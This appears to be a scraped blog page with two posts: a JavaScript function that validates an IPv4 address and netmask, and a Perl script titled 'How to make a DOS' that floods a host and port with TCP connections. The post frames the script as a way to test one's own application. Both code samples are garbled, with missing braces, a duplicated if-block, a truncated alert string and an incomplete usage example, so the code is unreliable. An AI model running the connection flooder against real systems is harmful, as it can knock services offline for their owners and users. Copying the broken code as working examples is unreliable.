I have written this javascript function to validate an IP address (IPv4) and the netmask inside a html form:
function checkip() {
var ipaddress = document.getElementById("ip").value;
var subnet = document.getElementById("netmask").value;
var patt = /^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/;
var match = ipaddress.match(patt);
var match2 = subnet.match(patt);
if (ipaddress == "") {
alert ("The IP Address field cannot be");
return false;
if (ipaddress == "") {
alert ("The IP Address field cannot be");
return false;
if (match == null) {
alert ("Please review your IP Adrress!");
return false;
if (match2 == null) {
alert ("Please review your Subnet Mask!");
return false;
else {
Validate/match IP address into a web form with Javascript
0 commenti Filed Under: Javascript
Perl - How to make a DOS
The purpose of this simple perl script is to test an application to understand if it is vulnerable at DOS (Denial of Service) attacks.
You can specify the TCP/IP number port, the ip address and the number of connections which you want send to your applications.
use IO::Socket;
if (@ARGV < 1) {
$ip = $ARGV[0];
$port = $ARGV[1];
$conn = $ARGV[2];
$num = 0;
print "I'm sending $ARGV[2] connection requests to port $ARGV[1]\n";
while ( $num <= $conn ) {
system("echo -n .");
$s = IO::Socket::INET->new(Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
print "\n Your $ARGV[2] connection requests have been done !\n";
sub usage() {
print "[-] Usage: <". $0 ."> <host> <port> <num-conn>\n";
print "[-] Example: ". $0 ." 21 1200\n";
0 commenti Filed Under: Perl